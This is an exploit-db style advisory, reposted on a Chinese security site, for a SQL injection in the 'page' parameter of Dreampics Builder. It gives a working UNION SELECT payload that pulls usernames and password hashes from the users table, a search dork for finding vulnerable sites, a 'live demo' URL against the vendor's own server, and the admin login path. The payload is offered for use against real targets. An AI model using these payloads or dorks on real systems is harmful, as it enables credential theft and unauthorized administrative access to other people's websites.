Dreampics Builder (page) Remote SQL Injection Vulnerability

所属分类：网络安全 / Exploit 阅读数： 97

收藏 0赞 0分享

#########################################################
#
# PICS BUILDER (page) SQL Injection Vulnerability
#========================================================
# Author: Hussin X =
# =
# Home : www.tryag.cc/cc =
# =
# email: darkangel_g85[at]Yahoo[DoT]com =
# =
#=========================================================
#
# script : http://www.dreamlevels.com/dreampics.php
#
# DorK : powered by Dreampics Builder
#
##########################################################

Exploit:

www.[target].com/Script/?page=-2 union select null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null from users--

L!VE DEMO:

http://www.dreamlevels.com/demo/photosite/?page=-2 union select null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null from users--

Admin Login :

/admin/

########################( Greetz )###########################
# #
# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke #
# #
# Iraqihack / FAHD / mos_chori / Silic0n #
# #
#############################################################

Im IRAQi

更多精彩内容其他人还在看

Dreampics Builder (page) Remote SQL Injection Vulnerability

AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability

PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit

PhotoPost vBGallery 2.4.2 Arbitrary File Upload Vulnerability

HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities

Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability

php Help Agent

Comdev Web Blogger

Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability

Galatolo Web Manager 1.3a

pSys 0.7.0 Alpha Multiple Remote File Inclusion Vulnerability

网络赚钱

站长故事